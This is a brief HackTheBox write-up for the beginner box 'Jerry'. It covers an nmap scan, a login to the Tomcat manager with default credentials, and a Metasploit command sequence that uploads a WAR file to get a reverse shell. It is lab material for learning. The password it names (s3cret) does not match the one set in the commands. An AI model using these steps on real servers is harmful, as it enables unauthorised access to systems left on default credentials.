This is the write up for Jerry. Jerry is part of the Beginners track on HackTheBox. I’m using Metasploit to exploit this machine once I have found the first credentials.
User and Root for Jerry
First we do an scan
nmap -T4 -A -p- 10.10.10.95
I see that TomCat/7.0.88 is running.
Navigating to the site reveals that the default website is still running
Click on manager app and tried the default credentials admin:admin
Now I’m getting this page
Ít is suggesting password s3cret. Let’s give that a try on the manager app
And we are in.
I know nothing about Tomcat. After one google string “Tomcat web application manager exploit” I came across the following site
Multiple Ways to Exploit Tomcat Manager (hackingarticles.in)
It seems we need a WAR file that we can upload and run to get a reverse shell. I’m going to use the msfconsole for this as stated in the site we found
Start up the msfconsole by typing
after the console is started. Type in the following commands
use exploit/multi/http/tomcat_mgr_upload set rhost 10.10.10.95 set rport 8080 set httpusername tomcat set httppassword tomcat set LHOST tun0 exploit
and now we have a shell
You can now get the flags at the appropriate locations
Conclusion of Jerry – HackTheBox
This is a very easy box and I need to do this box without msfconsole in the feature. But we see how dangerous it can be if we do not change default credentials. We could not do this exploit without those credentials
There is more on war files here How to Hack Apache Tomcat via Malicious WAR File Upload « Null Byte :: WonderHowTo
And this conclude the write up for Jerry on hackthebox